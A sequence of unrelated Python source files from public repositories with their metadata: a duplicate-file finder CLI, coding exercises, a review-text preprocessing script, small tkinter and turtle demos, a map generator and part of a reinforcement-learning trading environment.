if dirs:\n for d in ds['dirs'].all():\n Node = AppDB.DirNode(d['abs_path'])\n click.echo('%s' % (Node) )\n\n if hashes:\n for h in ds['files'].distinct('sha1'):\n click.echo('%s' % (h['sha1']))\n for f in ds['files'].find(sha1=h['sha1'], order_by='abs_path'):\n click.echo('\\t[%7s] . %s' % (f['status'], \n click.format_filename(f['abs_path'])) )\n\n@click.command('db-ls-files')\n@with_appcontext\ndef db_ls_files_command():\n \"\"\"List files in the database.\"\"\"\n db, ds = AppDB.get_db()\n\n for n in ds['files'].all():\n click.echo('[%7s] %s\\n\\t%s' % (n['status'], click.format_filename(n['abs_path']), n['sha1']) )\n click.echo('\\t%s\\n' % click.format_filename(json.dumps(n)) )\n return\n\n@click.command('db-ls-dirs')\n@with_appcontext\ndef db_ls_dirs_command():\n \"\"\"List dirs in the database.\"\"\"\n db, ds = AppDB.get_db()\n\n for n in ds['dirs'].all():\n click.echo('%s' % click.format_filename(n['abs_path']) )\n click.echo('\\t%s\\n' % click.format_filename(json.dumps(n)) )\n return\n\n\n@click.argument('file_name', type=click.Path(exists=True, file_okay=True, \n dir_okay=True, resolve_path=True), required=True)\n@click.command('rm')\n@with_appcontext\ndef db_rm_command(file_name, **kw):\n \"\"\" REMOVE file(s) from the database \"\"\"\n\n if file_name and os.path.isfile(file_name):\n fNode = AppDB.FileNode(file_name)\n fNode.score = fNode.test_unique() # Checks against DB by default\n click.echo('Removing: [%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n fNode.db_delete()\n return\n\n ## FIXME: file_name could be a different directory THIS WILL IGNORE\n ## Means we passed in '.' 
and we'll recursively remove all files from DB\n    dir_name = os.getcwd()\n    for r, subs, files in os.walk(dir_name):\n        if not check_dir(r): continue ## Skip directories that don't pass\n\n        for f in files:\n            if not check_file( os.path.join(r, f) ): continue\n            fNode = AppDB.FileNode( os.path.join(r, f) )\n            fNode.score = fNode.test_unique() # Checks against DB by default\n            click.echo('Removing: [%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n            fNode.db_delete()\n    \n@click.argument('file_name', type=click.Path(exists=True, file_okay=True, \n    dir_okay=False, resolve_path=True), required=False)\n@click.command('curse')\n@with_appcontext\ndef curse_command(file_name = False, **kw):\n    \"\"\" CURSE the database with known BAD files \"\"\"\n\n    if file_name:\n        fNode = AppDB.FileNode(file_name)\n        fNode.score = fNode.test_unique() # Checks against DB by default\n        click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n        fNode.set_status(\"CURSED\")\n        fNode.score = fNode.test_unique() # Checks against DB by default\n        click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n        fNode.db_add()\n        return\n\n    dir_name = os.getcwd()\n    ## It is possible to store files with the same hash into the DB this way\n    ## that should be ok - but worth noting that DB HASHES may not be unique\n    for r, subs, files in os.walk(dir_name):\n        if not check_dir(r): continue ## Skip directories that don't pass\n        click.echo('CURSING %s' % click.format_filename(r))\n\n        for f in files:\n            if not check_file( os.path.join(r, f) ): continue\n            fNode = AppDB.FileNode( os.path.join(r, f) )\n            fNode.set_status(\"CURSED\") ## NOTE: Can overwrite previously BLESSED files\n            fNode.db_add()\n\n            click.echo('\\t[%7s] %s' % (fNode.status, fNode) )\n\n@click.argument('file_name', type=click.Path(exists=True, file_okay=True, \n    dir_okay=True, resolve_path=True), required=False)\n@click.command('bless')\n@with_appcontext\ndef bless_command(file_name = False, **kw):\n    \"\"\" Populate the database with confirmed files \"\"\"\n\n    if file_name and os.path.isfile(file_name):\n        fNode = AppDB.FileNode(file_name)\n        fNode.score = fNode.test_unique()\n        click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n        fNode.set_status(\"BLESSED\")\n        fNode.score = fNode.test_unique()\n        click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n        fNode.db_add()\n        return\n\n    if file_name:\n        dir_name = file_name\n    else:\n        dir_name = os.getcwd()\n    ## It is possible to store files with the same hash into the DB this way\n    ## that should be ok - but worth noting that DB HASHES may not be unique\n    for r, subs, files in os.walk(dir_name):\n        if not check_dir(r): continue ## Skip directories that don't pass\n        click.echo('Blessing %s' % click.format_filename(r))\n\n        for f in files:\n            if not check_file( os.path.join(r, f) ): continue\n            fNode = AppDB.FileNode( os.path.join(r, f) )\n            fNode.set_status(\"BLESSED\") ## NOTE: Can overwrite previously CURSED files\n            fNode.db_add()\n\n            click.echo('\\t[%s] %s' % (fNode.status, fNode) )\n\n## Via: https://click.palletsprojects.com/en/7.x/api/#click.Path\n@click.argument('file_name', type=click.Path(exists=True, file_okay=True, \n    dir_okay=False, resolve_path=True), required=False)\n@click.option('-threshold', '-t', default=0)\n@click.option('--all/--no-all', default=False)\n@click.command('ls')\n@with_appcontext\ndef fs_ls_command(file_name = False, **kw): #, show_all_files = False):\n    \"\"\"List files on the filesystem based on database.\"\"\"\n\n    if file_name:\n        fNode = 
AppDB.FileNode(file_name)\n fNode.score = fNode.test_unique()\n click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n return\n\n file_list = [ ]\n dir_name = os.getcwd()\n\n for r, subs, files in os.walk(dir_name):\n if not check_dir(r): continue ## Skip directories that don't pass\n\n for f in files:\n if not check_file( os.path.join(r, f) ): continue ## Skip files that don't pass\n\n fNode = AppDB.FileNode( os.path.join(r, f) )\n file_list.append(fNode)\n\n ## Running this check vs in previous loop in case we wanted to do something else\n for fNode in file_list: \n fNode.score = fNode.test_unique() # Checks against DB by default\n\n dup_scores = [n.score for n in file_list if n.score > 0] or [0]\n min_score = min(dup_scores)\n max_score = max(dup_scores)\n\n if kw['threshold'] <= 0:\n ave_score = sum(dup_scores) / len(dup_scores)\n else:\n ave_score = kw['threshold']\n\n lower_T = int(ave_score * .8) ## arbitrary\n upper_T = int(ave_score * 1.2) ## arbitrary\n\n click.echo(\"\\t[%s [%s - %s] %s]\\n\" % (min_score, lower_T, upper_T, max_score) )\n for fNode in file_list:\n\n ## NOTE: The conditionals are meant for each node to have one exclusive action\n ##\n if \"BLESSED\" in fNode.status:\n pass ## Take no actions - these nodes are already in the DB\n elif \"CURSED\" in fNode.status:\n pass ## Take no actions - these nodes are already in the DB\n #\n # We know these won't be BLESSED or CURSED because of earlier checks\n # There may still be duplicates in the list - e.g. among other filesystem matches\n #\n elif fNode.score < 0: \n fNode.set_status(\"GOOD\") # this only means unique vs DB\n\n elif fNode.score >= upper_T:\n fNode.set_status(\"NUKE\") # Strong guess this is duplicate vs. DB\n \n elif fNode.score >= lower_T: # May want to rethink another level/test because same\n fNode.set_status(\"CHECK\") # action for: score == min_score and score == lower_T\n\n else:\n fNode.set_status(\"NOTSURE\")# > 0 but < lower_T - likely name match only\n\n if fNode.score > 0: ## FIXME: Make commandline flag\n if kw and kw['all']:\n click.echo('[%5s] %s' % (fNode.score, fNode) )\n elif not kw['all'] and fNode.status not in ['CURSED', 'NUKE']:\n ##Default only show ones to save\n click.echo('[%5s] %s' % (fNode.score, fNode) )\n \n\n \"\"\" \n ## Possible way to look / check for dups in FS before thinking about db_add()\n click.echo(\"\")\n ## In this case the highest score(s) is actually a good thing\n ## e.g. 
store the highest score and you match a lot of the filesystem dups\n    for fNode in file_list:\n        if fNode.score > 0 or \"BLESSED\" in fNode.status: continue\n        if \"GOOD\" not in fNode.status: continue ## Another way to filter\n        fNode.score = fNode.test_unique(file_list)\n        click.echo(\"%5s > %s\" % (fNode.score, fNode) )\n    \"\"\"\n\n## FIXME: How does this relate to `flask ls` and scoring?\n\n@click.argument('path', type=click.Path(exists=True, file_okay=True,\n                dir_okay=True, resolve_path=True), required=False)\n@click.option('-threshold', '-t', default=0)\n@click.option('--all/--no-all', default=False)\n@click.option('--blessed/--no-blessed', default=False)\n@click.option('--good/--no-good', default=False)\n@click.option('--nuke/--no-nuke', default=True)\n@click.command('hunt')\n@with_appcontext\ndef fs_hunt_command(path = None, **kw):\n    \"\"\" HUNT for files on the filesystem based on BLESSED files in the database.\"\"\"\n\n    if path and os.path.isfile(path):\n        fNode = AppDB.FileNode(path)\n        fNode.score = fNode.test_unique()\n        fNode.shade_unique()\n        click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n        return\n\n    db, ds = AppDB.get_db()\n    table = ds['files']\n\n    if not path: path = os.getcwd()\n\n    for r, subs, files in os.walk(path):\n        if not check_dir(r): continue ## Skip directories that don't pass\n\n        for f in files:\n            if not check_file( os.path.join(r, f) ): continue ## Skip some files\n\n            fNode_fs = AppDB.FileNode( os.path.join(r, f) )\n            fNode_fs.score = fNode_fs.test_unique()\n            fNode_fs.shade_unique()\n\n            ## NOTE: This logic will *NOT* show BLESSED FILES as 'good' - SO DONT just RM DIR!!!\n            if kw['all']:\n                click.echo('[%7s] @ [%5s] %s' % (fNode_fs.status, fNode_fs.score, fNode_fs) )\n            else: ## Want more limited printing\n                if kw['good'] and fNode_fs.status in ['CHECK', 'NOTSURE', 'GOOD', 'unknown']:\n                    click.echo('[%7s] @ [%5s] %s' % (fNode_fs.status, fNode_fs.score, fNode_fs) )\n                if kw['nuke'] and fNode_fs.status in ['CURSED', 'NUKE']:\n                    click.echo('[%7s] @ [%5s] %s' % (fNode_fs.status, fNode_fs.score, fNode_fs) )\n                if kw['blessed'] and fNode_fs.status in ['BLESSED']:\n                    click.echo('[%7s] @ [%5s] %s' % (fNode_fs.status, fNode_fs.score, fNode_fs) )\n\n## FIXME: Placeholder - NEEDS TO BE COMPLETED\n@click.command('X_clean')\n@with_appcontext\ndef fs_clean_command(**kw):\n    \"\"\"INCOMPLETE - Clean - aka DELETE - files on the filesystem \"\"\"\n    dir_name = os.getcwd()\n\n    for r, subs, files in os.walk(dir_name):\n        if not check_dir(r): continue # Skip directories that don't pass\n\n        for f in files:\n            if not check_file( os.path.join(r, f) ): continue\n\n            abs_src = os.path.join(r, f)\n            fNode = AppDB.FileNode(abs_src)\n\n            if not fNode.is_unique():\n                click.echo('NUKE: %s' % (fNode) )\n            else:\n                click.echo('%s' % (fNode) )\n\n## FIXME: Placeholder - NEEDS TO BE COMPLETED\n@click.command('X_sweep')\n@click.option('--dst-name', default=False)\n@with_appcontext\ndef fs_sweep_command(**kw):\n    \"\"\" INCOMPLETE - Sweep files on the filesystem \"\"\"\n    dir_name = os.getcwd()\n    if not kw['dst_name']: kw['dst_name'] = current_app.config['DST_DIR_NAME']\n\n    replace_dir, _ = os.path.split(dir_name)\n\n    for r, subs, files in os.walk(dir_name):\n        if not check_dir(r): continue # Skip directories that don't pass\n\n        for f in files:\n            if not check_file( os.path.join(r, f) ): continue\n\n            abs_src = os.path.join(r, f)\n            fNode = AppDB.FileNode(abs_src)\n\n            if fNode.is_unique():\n                click.echo('%s' % (fNode) )\n                new_dst = os.path.join(r, f).replace(replace_dir, kw['dst_name'])\n                click.echo('\\t%s' % 
(new_dst) )\n\n                ## FIXME: Need to figure out what to do w/ node \n                ##        - e.g. delete old, make new, store new?\n\n                ## Maybe green means it's not in DB and is new \n                ##       purple means it is and should be deleted\n\n\n@click.argument('path', type=click.Path(exists=True, file_okay=True, \n                dir_okay=True, resolve_path=True), required=False)\n@click.command('hash_scan')\n@with_appcontext\ndef hash_scan_command(path = False, **kw):\n    \"\"\" Populate the database with confirmed files \"\"\"\n    if not path: path = os.getcwd()\n\n    HASH_DB_PATH = 'sqlite:///' + '/Users/wjhuie/bin/instance/cleansweep_hashes.sqlite'\n    click.echo(HASH_DB_PATH)\n\n    db = dataset.connect(HASH_DB_PATH)\n    hash_ds = db['hashes']\n\n    def add_hash(fNode, table = hash_ds):\n        if table.find_one(abs_path=fNode.abs_path): return\n\n        fNode.get_hash()\n        entry = { 'abs_path': fNode.abs_path, 'sha1': fNode.sha1 }\n\n        try:\n            table.upsert(entry, ['abs_path'])\n            click.echo('HASH ADDED: %s # %s' % (fNode.sha1, fNode) )\n        except:\n            click.echo( \"Error trying to ADD HASH: %s\" % (fNode) )\n\n    if path and os.path.isfile(path):\n        fNode = AppDB.FileNode(path)\n        add_hash(fNode)\n        return\n\n    for r, subs, files in os.walk(path):\n        if not check_dir(r): continue ## Skip directories that don't pass\n\n        for f in files:\n            if not check_file( os.path.join(r, f) ): continue\n            fNode = AppDB.FileNode( os.path.join(r, f) )\n            add_hash(fNode)\n\n    hash_ds.create_index(['abs_path', 'sha1'])\n\n","repo_name":"thecapacity/cleansweep","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":15738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"1324871403","text":"#Uses python3\n\nimport sys\n\ndef largest_number(a):\n    #write your code here\n    res = \"\"\n    controller = 0\n    length = len(a)\n    while controller < length:\n        bm = \"0\"\n        bm_index = -1\n        for index in range(len(a)):\n            temp1 = int(a[index] + bm)\n            temp2 = int(bm + a[index])\n            if temp1 > temp2:\n                bm = a[index]\n                bm_index = index\n\n        a.pop(bm_index) # Remove the chosen number from the list\n        res = res + bm\n        controller += 1\n\n    res = int(res)\n\n    return res\n\n\nif __name__ == '__main__':\n    raw = sys.stdin.read()\n    #raw = input()\n    data = raw.split()\n    a = data[1:]\n    print(largest_number(a))\n\n","repo_name":"DimonYin/Coursera_Courses_Dimon_Yin","sub_path":"Data Structures and Algorithms (UCSD & NRUHSE)/Course 1_Algorithmic Toolbox/Week3/Programming Assignment 3_Greedy Algorithms/largest_number.py","file_name":"largest_number.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"12143437998","text":"# Use pytorch_py3.8.8\n# Operations:\n    # Remove non-ascii words.\n    # Remove non-english texts.\n    \nimport logging\nimport glob\nimport nltk.data\nfrom nltk.corpus import stopwords\nimport pandas as pd\nimport numpy as np\nfrom multiprocessing import Pool\nimport langdetect\nfrom langdetect import DetectorFactory\nfrom nltk.tokenize import word_tokenize\nimport os\n\nDetectorFactory.seed = 0\nlogging.basicConfig(\n    # filename='out.log',\n    level=logging.INFO,\n    format='%(asctime)s %(levelname)s %(message)s')\nlogger = logging.getLogger(__name__)\n\n# All_Beauty\n# AMAZON_FASHION\n# CDs_and_Vinyl\n# Cell_Phones_and_Accessories\n# Digital_Music\n# Electronics\n# Industrial_and_Scientific\n# Luxury_Beauty\n# Musical_Instruments\n# Software\n# Video_Games\n\ndata_name = 'All_Beauty'\ndata_path = f'/home/tuomas/Python/Gradu/data_processing/datasets/Amazon 
review data/Original/{data_name}/'\nsave_path = f'/home/tuomas/Python/Gradu/data_processing/datasets/Amazon review data/Preprocess_common1/{data_name}/'\nfilenames = glob.glob(data_path + '*.csv')\nfilenames.sort()\nfilenames=[filenames[0]]\n\ntry:\n    os.makedirs(save_path)\nexcept FileExistsError:\n    pass\n\n#%%\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\nstop = stopwords.words('english')\n\nremove_nonascii_pattern = '([a-zA-Z]*[\\u0080-\\uFFFF]+[a-zA-Z]+|[a-zA-Z]+[\\u0080-\\uFFFF]+[a-zA-Z]*|[\\u0080-\\uFFFF]+)'\n\ndef remove_words(df, pattern=None): # If lemmatize: must use for loop\n    df['reviewText'] = df['reviewText'].str.replace(pattern, '', regex=True)\n    df['reviewText'] = df['reviewText'].str.split()\n    df['reviewText'] = df['reviewText'].str.join(sep=' ')\n    #df['reviewText'] = df['reviewText'].str.lower()\n    return df\n\ndef remove_nonenglish_texts(df):\n    is_english = []\n    for rt in df['reviewText']:\n        try:\n            lang = langdetect.detect(rt)\n            is_english.append(lang=='en')\n        except:\n            is_english.append(False)\n        \n    return df[is_english]\n\ndef add_SPOS_indices(df):\n    positions = []\n    for rt in df['reviewText']:\n        rt_len = word_tokenize(rt)\n        positions.append(np.arange(len(rt_len)).tolist())\n        #df['SPOS_idx'] = np.arange(rt_len).tolist()\n        \n    df['SPOS_idx'] = positions\n    return df\n    \n    \nprocesses = 16\ncurr_docid = 0\nfor i, fn in enumerate(filenames):\n    logger.info(f\"Processing {(i+1)}/{len(filenames)}\")\n    df_split = pd.read_csv(fn)\n    # Add document id column (for sentence tokenization)\n    df_split.insert(0,'doc_id',np.arange(curr_docid, curr_docid+df_split.shape[0]))\n    curr_docid += df_split.shape[0]\n    # Add new column to indicate word positions in StanfordPOS dataframe (used in later preprocessing steps)\n    #df_split.insert(loc=4,column='SPOS_idx',value=np.nan)\n    \n    df_split = np.array_split(df_split, processes)\n    pool = Pool(processes)\n    \n    logger.info(\"Removing non-ascii words...\")\n    df_split = pool.starmap(remove_words, list(zip(df_split, [remove_nonascii_pattern]*processes)))\n    \n    logger.info(\"Removing non-english texts...\")\n    df_split = pool.map(remove_nonenglish_texts, df_split)\n    \n    logger.info(\"Adding word positions...\")\n    df_split = pool.map(add_SPOS_indices, df_split)\n    \n    logger.info(\"Saving...\")\n    pool.close()\n    pool.join()\n    df_split = pd.concat(df_split)\n    df_split['reviewText'].replace('', np.nan, inplace=True) \n    df_split = df_split.dropna(subset=['reviewText'])\n    fn = save_path + fn.split('/')[-1][:-4]+'_StanfordPOS.csv'\n    df_split.to_csv(fn, index=False)\n    \n    \nlogger.info(\"Done!\")\n    \n    \n#%%\nfn='/home/tuomas/Python/Gradu/data_processing/datasets/Amazon review data/Preprocessed_common/All_Beauty/All_Beauty-0_StanfordPOS.csv'\ndf = pd.read_csv(fn)\n\ndf['SPOS_idx']=df['SPOS_idx'].apply(eval)\n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    \n    ","repo_name":"TP1997/Text-Preprocessing","sub_path":"Sentiment/preprocess_common1.py","file_name":"preprocess_common1.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"14799907232","text":"#!/usr/bin/python3\nimport sys\nfrom tkinter import *\nmywin = Tk()\n\n# React to a mouse click in the window\ndef win_click(event):\n    print(\"Mouse click\", event.x, event.y)\n\n# React to keyboard input\ndef win_key(event):\n    print(\"Key press\", event.char) \n    if event.char.lower() == 'q': sys.exit()\n    \n# React to the program ending\ndef win_close():\n    # 
Clean-up work ..\n    mywin.quit()\n    \nmywin.geometry(\"100x100\")\nmywin.bind('<Button-1>', win_click)\nmywin.bind('<Key>', win_key) \nmywin.protocol(\"WM_DELETE_WINDOW\", win_close)\nmywin.mainloop()\n","repo_name":"Eskimo-SVD/Oliver_private_Bude","sub_path":"RaspberryPI_Handbuch/kap16-18-python/tkinter-events.py","file_name":"tkinter-events.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
+{"seq_id":"37922905048","text":"import tkinter as tk\n\nfrom ui.consts.ColorConsts import ColorConsts\n\nclass FormFieldFrame(tk.Frame):\n    def __init__(self, window: tk.Tk, master: tk.Widget, label: type, entry: type, option_var: type = None, *widgets) -> None:\n        super().__init__(\n            master,\n            background = ColorConsts.LIGHT_GREY,\n            highlightthickness = 2,\n            highlightbackground = ColorConsts.BLACK\n        )\n        self.window = window\n        self.label = label(self.window, self)\n        if option_var is not None:\n            self.option_var = option_var(self.window, self)\n            self.field = entry(self.window, self, self.option_var)\n        else:\n            self.field = entry(self.window, self)\n        self.widgets = []\n        for widget in widgets:\n            self.widgets.append(widget(self.window, self))\n        self.pack(fill = tk.X, padx = 15, pady = (15, 0))","repo_name":"wjrm500/Pawnfork","sub_path":"ui/window/main/create_deck/deck_form/FormFieldFrame.py","file_name":"FormFieldFrame.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"666413119","text":"#Macie Pelle Thursday 3:30pm\r\n#mpelle@purdue.edu\r\n#This program uses user-defined functions that main() calls when the matching menu choice is entered\r\n# Academic Honesty:\r\n#I attest that this is my original work.\r\n#I have not used unauthorized source code, either modified or unmodified.\r\n#I have not given other fellow student(s) access to my program.\r\n\r\ndef factorial(n):\r\n    \r\n    factorial = 1\r\n    num = n\r\n    #finds the factorial of the number entered by the user\r\n    for i in range(1, n +1):\r\n        factorial = factorial * i\r\n    print(num, \"!=\", factorial, \"\\n\")\r\n    \r\ndef sumOdds(x, y):\r\n    \r\n    print(\"Displaying odd numbers from n1 to n2 (n1<=n2)\")\r\n    \r\n    sum = 0\r\n    #Prints the odd numbers in the range the user entered and finds their sum\r\n    for i in range(x, y + 1):\r\n        if (i % 2 != 0):\r\n            print(\" \")\r\n            print(i, end= \" \")\r\n            sum = sum + i\r\n    print(\"\\n\")\r\n    print(\"The sum of odd numbers is \", sum)\r\n    \r\ndef sumInverse(n1, n2):\r\n    print(\"Displaying the inverse of the numbers from n1 to n2 (n1<=n2)\")\r\n    \r\n    sum = 0.0\r\n    #finds the inverse of numbers entered by the user and finds the sum\r\n    for i in range(n1, n2+1):\r\n\r\n        print(\"1 /\", str(i))\r\n\r\n        sum = sum + (1 / i)\r\n    #Prints the sum of the numbers and formats it to two decimal places\r\n    print(\"The sum of numbers between \", str(n1), \"and\", str(n2), \"is: \", \"{:.2f}\".format(sum))\r\n    \r\ndef findChar(sentence, letter):\r\n    \r\n    sum = 0\r\n    #finds the number of times a letter appears in a string\r\n    for i in sentence:\r\n        if i.upper() == letter.upper():\r\n            sum = sum + 1\r\n    #outputs the number of matching characters based on the user input\r\n    print(\"The character\", letter, \"appeared \" + str(sum))\r\n    \r\n\r\ndef main():\r\n    #controls the while loop\r\n    loopCtrl = True\r\n    #when true, the commands in the loop will run\r\n    while loopCtrl:\r\n        #outputs the user's choices\r\n        print(\"==================User Defined Functions 
Menu==================\\n1. Compute n Factorial\\n2. Sum of all odd numbers from n1 to n2 (n1<=n2)\\n3. Sum of the inverse of the numbers between n1 and n2 (n1<=n2)\\n4. Find the number of characters\\n5. Exit\\n===============================================================\\n\")\r\n        \r\n        choice = int(input(\"Choose one of the options to perform: \"))\r\n        \r\n        if choice == 1:\r\n            print(\"1. Compute n Factorial\")\r\n            \r\n            n = int(input(\"Please enter a natural number for n: \"))\r\n            #called from the main loop when choice 1 is entered \r\n            factorial(n)\r\n            \r\n        elif choice == 2:\r\n            print(\"\\n2. Sum of all odd numbers from n1 to n2 (n1<=n2)\")\r\n            #tells the user to input a value\r\n            x = int(input(\"Please enter a natural number for n1: \"))\r\n            y = int(input(\"Please enter a natural number for n2: \"))\r\n            #called from the main loop when choice 2 is entered \r\n            sumOdds(x,y)\r\n            \r\n        elif choice == 3:\r\n            print(\"\\n3. Sum of the inverse of the numbers between n1 and n2 (n1<=n2)\")\r\n            \r\n            n1 = int(input(\"Please enter a natural number for n1: \"))\r\n            n2 = int(input(\"Please enter a natural number for n2: \"))\r\n            #called from the main loop when choice 3 is entered \r\n            sumInverse(n1, n2)\r\n            \r\n        elif choice == 4:\r\n            print(\"4. Find the number of characters\")\r\n            \r\n            sentence = input(\"Please enter the string to work on: \")\r\n            letter = input(\"Please enter a character that you want to count in the string entered above: \")\r\n            #called from the main loop when choice 4 is entered \r\n            findChar(sentence, letter)\r\n        #Exits the while loop \r\n        elif choice == 5:\r\n            print(\"Bye\")\r\n            loopCtrl = False\r\n        #tells the user their input is invalid \r\n        else:\r\n            print(\"Invalid option! Enter a number between 1 and 5\")\r\n            \r\nmain()","repo_name":"macaronios/CNIT-155","sub_path":"Assignment07.py","file_name":"Assignment07.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"73343290969","text":"import random, math\n\ndef makeRoom():\n    w = math.floor(random.random()*4)+2\n    h = math.floor(random.random()*4)+2\n    return [w,h]\n    \ndef makeHall(wide):\n    if wide:\n        w = math.floor(random.random()*5)+5\n        h = 2#math.floor(random.random()*2)+2\n    else:\n        w = 2#math.floor(random.random()*2)+2\n        h = math.floor(random.random()*5)+5\n    return [w,h]\n\nclass Room:\n    def __init__(self, x, y, w, h):\n        self.x = x\n        self.y = y\n        self.w = w\n        self.h = h\n    \ndef genMap(size):\n    # current = [makeRoom()]\n    rooms = []\n    cloks = [[0,0]]\n    cSize = 0\n    while cloks and cSize < size:\n        c = makeRoom()#current.pop(0)\n        loc = cloks.pop(0)\n        croom = Room(loc[0], loc[1], c[0], c[1])\n        rooms += [croom]\n        # hall1 = makeHall(True)\n        # rooms += [Room(croom.x-hall1[0], croom.y+2, hall1[0], hall1[1]]\n        tallhall = makeHall(False)\n        rooms += [Room(croom.x+2, croom.y+croom.h, tallhall[0], tallhall[1])]\n        cloks += [[croom.x, croom.y+croom.h+tallhall[1]]]\n        widehall = makeHall(True)\n        rooms += [Room(croom.x+croom.w, croom.y+2, widehall[0], widehall[1])]\n        cloks += [[croom.x+croom.w+widehall[0], croom.y]]\n        cSize += 1\n    return rooms\n    \ndef drawMap(rooms):\n    fullMap = [[1]*30 for i in range(0, 30)]\n    # print([i.h for i in rooms])\n    for i in rooms:\n        for j in range(0, i.h):\n            fullMap[i.y+j][i.x:i.x+i.w] = [0]*i.w\n    return fullMap\n    \ndef printMap(map):\n    for i in map:\n        print(''.join([str(j) for j in i]))\n    \nprintMap(drawMap(genMap(3)))\n 
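\n# Usage sketch (hypothetical addition, not in the original file): seeding\n# Python's RNG makes the generated map reproducible across runs, e.g.\n# random.seed(42)\n# printMap(drawMap(genMap(3)))\n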
","repo_name":"B3NJP/FinalSDDProject","sub_path":"MapGen.py","file_name":"MapGen.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4390645574","text":"import turtle\nt=turtle.Pen()\nt.speed(0)\ncolors=[\"red\",\"black\",\"blue\",\"orange\",\"green\",\"purple\",\"pink\"]\nfor x in range(200):\n sides=6\n t.pencolor(colors[x%sides])\n t.width(2)\n t.forward(x)\n t.left(60)","repo_name":"RishiKuls/turtle-programing-python","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33501699060","text":"import gym\nimport pandas as pd\nimport numpy as np\n\nfrom gym import spaces\nfrom enum import Enum\nfrom typing import List, Dict\n\nfrom lib.env.render import TradingChart\nfrom lib.env.reward import BaseRewardStrategy, IncrementalProfit, WeightedUnrealizedProfit\nfrom lib.env.trade import BaseTradeStrategy, SimulatedTradeStrategy\nfrom lib.data.providers import BaseDataProvider\nfrom lib.data.features.transform import max_min_normalize, mean_normalize, log_and_difference, difference\nfrom lib.util.logger import init_logger\n\n\nclass TradingEnvAction(Enum):\n BUY = 0\n SELL = 1\n HOLD = 2\n\n\nclass TradingEnv(gym.Env):\n '''A reinforcement trading environment made for use with gym-enabled algorithms'''\n metadata = {'render.modes': ['human', 'system', 'none']}\n viewer = None\n\n def __init__(self,\n data_provider: BaseDataProvider,\n reward_strategy: BaseRewardStrategy = IncrementalProfit,\n trade_strategy: BaseTradeStrategy = SimulatedTradeStrategy,\n initial_balance: int = 10000,\n commissionPercent: float = 0.25,\n maxSlippagePercent: float = 2.0,\n **kwargs):\n super(TradingEnv, self).__init__()\n\n self.logger = kwargs.get('logger', init_logger(__name__, show_debug=kwargs.get('show_debug', True)))\n\n self.base_precision: int = kwargs.get('base_precision', 2)\n self.asset_precision: int = kwargs.get('asset_precision', 8)\n self.min_cost_limit: float = kwargs.get('min_cost_limit', 1E-3)\n self.min_amount_limit: float = kwargs.get('min_amount_limit', 1E-3)\n\n self.initial_balance = round(initial_balance, self.base_precision)\n self.commissionPercent = commissionPercent\n self.maxSlippagePercent = maxSlippagePercent\n\n self.data_provider = data_provider\n self.reward_strategy = reward_strategy()\n self.trade_strategy = trade_strategy(commissionPercent=self.commissionPercent,\n maxSlippagePercent=self.maxSlippagePercent,\n base_precision=self.base_precision,\n asset_precision=self.asset_precision,\n min_cost_limit=self.min_cost_limit,\n min_amount_limit=self.min_amount_limit)\n\n self.render_benchmarks: List[Dict] = kwargs.get('render_benchmarks', [])\n self.normalize_obs: bool = kwargs.get('normalize_obs', True)\n self.stationarize_obs: bool = kwargs.get('stationarize_obs', True)\n self.normalize_rewards: bool = kwargs.get('normalize_rewards', False)\n self.stationarize_rewards: bool = kwargs.get('stationarize_rewards', True)\n\n self.n_discrete_actions: int = kwargs.get('n_discrete_actions', 24)\n self.action_space = spaces.Discrete(self.n_discrete_actions)\n\n self.n_features = 6 + len(self.data_provider.columns)\n self.obs_shape = (1, self.n_features)\n self.observation_space = spaces.Box(low=0, high=1, shape=self.obs_shape, dtype=np.float16)\n\n self.observations = pd.DataFrame(None, columns=self.data_provider.columns)\n\n def _current_price(self, 
ohlcv_key: str = 'Close'):\n return float(self.current_ohlcv[ohlcv_key])\n\n def _get_trade(self, action: int):\n n_action_types = 3\n n_amount_bins = int(self.n_discrete_actions / n_action_types)\n\n action_type: TradingEnvAction = TradingEnvAction(action % n_action_types)\n action_amount = float(1 / (action % n_amount_bins + 1))\n\n amount_asset_to_buy = 0\n amount_asset_to_sell = 0\n\n if action_type == TradingEnvAction.BUY and self.balance >= self.min_cost_limit:\n price_adjustment = (1 + (self.commissionPercent / 100)) * (1 + (self.maxSlippagePercent / 100))\n buy_price = round(self._current_price() * price_adjustment, self.base_precision)\n amount_asset_to_buy = round(self.balance * action_amount / buy_price, self.asset_precision)\n elif action_type == TradingEnvAction.SELL and self.asset_held >= self.min_amount_limit:\n amount_asset_to_sell = round(self.asset_held * action_amount, self.asset_precision)\n\n return amount_asset_to_buy, amount_asset_to_sell\n\n def _take_action(self, action: int):\n amount_asset_to_buy, 